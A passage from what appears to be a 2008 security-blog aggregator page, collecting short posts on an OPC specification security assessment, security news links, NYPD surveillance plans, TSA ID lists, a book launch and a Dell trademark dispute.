One last point that is important to highlight in this introduction is the OPC Foundation’s interest in security. The OPC Foundation took an attitude that is still all too rare. They were eager and supportive of this assessment. In addition to the specification and SDK that any member can get, the OPC Foundation also provided the source code. In return, Digital Bond provided the OPC Foundation the full assessment report including findings and recommendations.

In discussions throughout the assessment it was very clear the OPC Foundation wanted to identify any security problems, and they wanted to fix them. In fact, you will note that Part 7 will list how the OPC Foundation has addressed and corrected the majority of the findings. We are aware a lot of this is already done or in process, but we will hold off on Part 7 until the revised specification and SDK are available.

Security Briefing: August 14th [Liquidmatrix Security Digest]

Posted: 14 Aug 2008 07:28 AM CDT


Yesterday was a whirlwind but, at the very least I was productive. Tried my “loud music while working” trick again. Worked like a champ.

Click here to subscribe to Liquidmatrix Security Digest!.

And now, the news…

  1. Bumper Patch Tuesday plugs multiple Office flaws | The Register
  2. Pentagon puts hold on USAF cyber effort | The AP
  3. Security Flap Slams Wells Fargo Over Data Breach | Internet News
  4. TSA Clears Clear Program Operator | BTN
  5. Petty officers charged in computer hacking | Globe and Mail
  6. Google tries its hand at cryptography | vnunet
  7. Extradition of UFO hacking accused delayed by fortnight | The Herald
  8. The Best of 2600 Details the Milestones of Hacking | Wired
  9. Government Security of Information Still Needs Work | CFP

Tags: , , , ,

You Decide! [ - A Revolution is the Solution]

Posted: 14 Aug 2008 05:28 AM CDT

Is this:

1) A brilliant defence of

2) A scathing attack on

3) Something that was, in fact, posted by The Batman of Zur-En-Arrh while out of his mind on PCP.

Because I honestly have no idea.

New NoVA Infosec Calendar Feature & ShareThis Capability []

Posted: 14 Aug 2008 02:06 AM CDT

In an effort to help everyone plan a little bit more in advance, we’ve added a calendar for events that take place in or around NoVA. Currently, we’re just beta testing it to see how it works out. Please feel free to let us know what you think in the comments for this post. Also, use our Contact Us page to submit events that you would like added to the calendar. I’m hoping that in the future we can set something up so anyone can add events (with a little moderation of course :) ). Any suggestions would be appreciated. You may have also noticed that we added a ShareThis capability in our posts and pages. Hopefully, this feature will make it easier for you to pass along any nuggets to other infosec professionals. Enjoy!

Unfair Advantage [ImperViews]

Posted: 14 Aug 2008 12:06 AM CDT

Michael Phelps.pngEveryone (read: me) is looking for an unfair advantage. the cloak of invisibility that allows you to see and not be seen or makes your product sell like there's nothing else.

If you were watching the Summer Olympics swimming contest, you could have understand how technology can be translated into unfair advantage, in its positive meaning. The number of new world records is sky rocketing. In fact, it looks like we have a new world record for the number of world records....

Taste some of the debate at the Sport Scientists , and here the other experts are claiming that it's harmful. The unfair advantage is not just a result of the new suit technology (priced at $550 versus the regular $25 swimsuit). It's also the result of differently designed swimming pool (deeper, wider), more lanes, better springboard etc. Assuming that everything's legal (no drugs, the stopwatches are working perfectly etc.) the Chinese have managed to create the technology advantage that changes the rules of the game for everyone, while Speedo provides the unfair advantage to anyone that wears their suit.

Twitter Updates for 2008-08-13 [.:Computer Defense:.]

Posted: 13 Aug 2008 10:59 PM CDT

  • <-- latest blog post #
  • @gattaca coffee would be nice... there's something about being up all night that can be tiring. #
  • @gattaca Not really youth... more Microsoft Tuesday :) #
  • @gattaca hopefully soon... #
  • A few hours sleep and you feel much better. #

Powered by Twitter Tools.

I Should Have Seen This Coming []

Posted: 13 Aug 2008 10:56 PM CDT

It all started about 11:15 today.  As I got out of my chair to leave to go pick up a sick kid I noticed El Sidekick had some road rash on his chin.  His reluctance to explain what happened kicked my imagination into overdrive to a point that I don’t want to know what happened because it will just be disappointing compared to what my brain came up with.  I worked from home this afternoon preparing to support El Sidekick upgrade our two LANsight Security Management Appliances to the latest 5.1 code.  I downloaded and read the documentation (a rarity for me) to get myself prepared.  The upgrade was supposed to happen at 6:30 PM tonight.  “Supposed to” being the key words there.  Late this afternoon I get the configs backed up just incase things went south during the upgrade.  We’re all set.  6:30 comes and goes.  6:45 comes and goes.  7:00 comes and goes.  At 7:07 I email El Sidekick a message that said “sure are using the word ‘about’ loosely” in reference to an “about 6:30″ start time.  Finally at 7:19 I get a reply.  Being nearly an hour behind now should have been another clue as to how the night would end.  We had to make some networking changes in order to accomodate the new hardware, being installed tomorrow, so once that was complete we were ready for the upgrade.  First attempt revealed a web server issue that we had to work through.  Once we got that behind us we were cleared for take off.  Unfortunately the plane never even left the gate.  When initiating the upgrade we got an error so vague that only one thing came to mind.

Michael Bolton

We did the standard operating procedure to try to get around it.  Rebooted the server, downloaded the upgrade image again, etc, etc all with no luck.

Why should I change my name?  He’s the one that sucks.  - Michael Bolton in Office Space

This posting includes an audio/video/photo media file: Download Now

Outrage At NY Police Tracking Plan [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 08:21 PM CDT

The NYPD has set off the community with a proposed plan to track vehicles with the use of a mesh of cameras. The entire idea is to drop a surveillance web across Manhattan. All of this under the guise of avoiding another terrorist attack. The ultimate “go to” excuse to strip away rights and spend money on blinking lights.

From The Guardian:

As well as placing cameras at all tunnels and bridges into Manhattan, the 36-page plan, called Operation Sentinel, calls for a security ring to be erected at Ground Zero and for a 50-mile buffer zone around the city within which mobile units would search for nuclear or “dirty” bombs.

The proposals are partly based on the so-called ring of steel erected around the City of London in the wake of IRA bombings in the 1990s. Though the 3,000 cameras that could be mounted as a result of the plans of the New York police pale in comparison with the multitude of cameras in operation on the UK’s roads and in public places, the proposals have provoked outrage in the United States, where the concept of video surveillance is relatively unfamiliar .

Folks in NYC might be pissed at this possibility. I would offer that this has been shown to be relatively ineffective in London where the “ring of steel” does little more than spot the occasional pan handler.

The New York “sentinel” video system will be set up to record license plates of all vehicles at every point into Manhattan. The data would be “kept on computer for a month”. Uh huh. If you are willing to swallow that nonsense I have some land in Florida I would be willing to sell ya.

For the full article read on.

Article Link
Article Link

raWPacket HeX - Network Security Monitoring & Analysis LiveCD [Darknet - The Darkside]

Posted: 13 Aug 2008 04:01 PM CDT

HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis work flow logic must be enhanced and emphasized through-out the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be...

Read the full post at

Applied Security Visualization Book is Available! [Raffy - Security Data Visualization]

Posted: 13 Aug 2008 03:38 PM CDT

picture-5.pngThe Applied Security Visualization book is DONE and available in your favorite store!

Last Tuesday when I arrived at BlackHat, I walked straight up to the book store. And there it was! I held it in my hands for the first time. I have to say, it was a really emotional moment. Seeing the product of 1.5 years of work was just amazing. I am really happy with how the book turned out. The color insert in the middle is a real eye-catcher for people flipping through the book and it greatly helps making some of the graphs better interpretable.

2754352452_e3ed2c1d0f.jpgI had a few copies to give away during BlackHat and DefCon. I am glad I was able to give copies to some people that have contributed by inspiring me, challenging me, or even giving me very specific use-cases that I collected in the book. Thanks everyone again! I really appreciate all your help.

People keep asking me what the next project is now that the book is out. Well, I am still busy. is one of my projects. I am trying to get more people involved in the discussions and get more people to contribute graphs. Another project I am starting is to build out a training around the book, which I want to teach at security conferences. I have a few leads already for that. Drop me a note if you would be interested in taking such a training. Maybe I will also get some time to work on AfterGlow some more. I have a lot of ideas on that end…

During DefCon, I recorded a PodCast with Martin McKeay where I talk a little bit about the book.

This posting includes an audio/video/photo media file: Download Now

USPTO To Revisit Dell’s ‘Cloud Computing’ Claim [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 02:29 PM CDT

Catching up on my reading. I missed this article last week as I was focused on BH/Defcon. There’s some good news from the US Patent office for a change.

From IT World:

The U.S. Patent and Trademark Office (USPTO) has done an about face on Dell Inc.’s effort to claim a trademark on “cloud computing,” and is reconsidering its earlier action.

Dell had received near final approval for this trademark, but the USPTO canceled its “Notice of Allowance” on Tuesday, according to trademark records. The application has been “returned to examination.”

Dell spokesman David Frink said the company isn’t commenting on the USPTO’s action, other than to acknowledge that the issue is going back to the examiner for additional review. He didn’t want to speculate on what that might mean.

Read on for the full article.

Article Link

TSA Puts Fliers Without ID On A List [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 02:24 PM CDT

So, if it wasn’t bad enough that there are 1 million plus folks on the “do not fly” list it appears that there is another list in the USA. The TSA (my buds) have managed to take the names of people who fly within the US without ID, which is legal, and compile a list. So, where have these names ended up? Funny you ask. They’ve been added to a database of folks who have violated security laws or have been questioned due to their behaviour.


From USA Today:

The TSA began storing the information in late June, tracking many people who said they had forgotten their driver’s license or passport at home. The database has 16,500 records of such people and is open to law enforcement agencies, according to the TSA.

Asked about the program, TSA chief Kip Hawley told USA TODAY in an interview Tuesday that the information helps track potential terrorists who may be “probing the system” by trying to get though checkpoints at various airports.

OK, so let me get this straight this info is to “helps track potential terrorists”? Did anyone at the TSA miss the fact that it is perfectly legal for US citizens to travel without ID within the States? And the data will be stored in some cases for up to 15 years.

Don’t forget your wallet.

Article Link

No comments: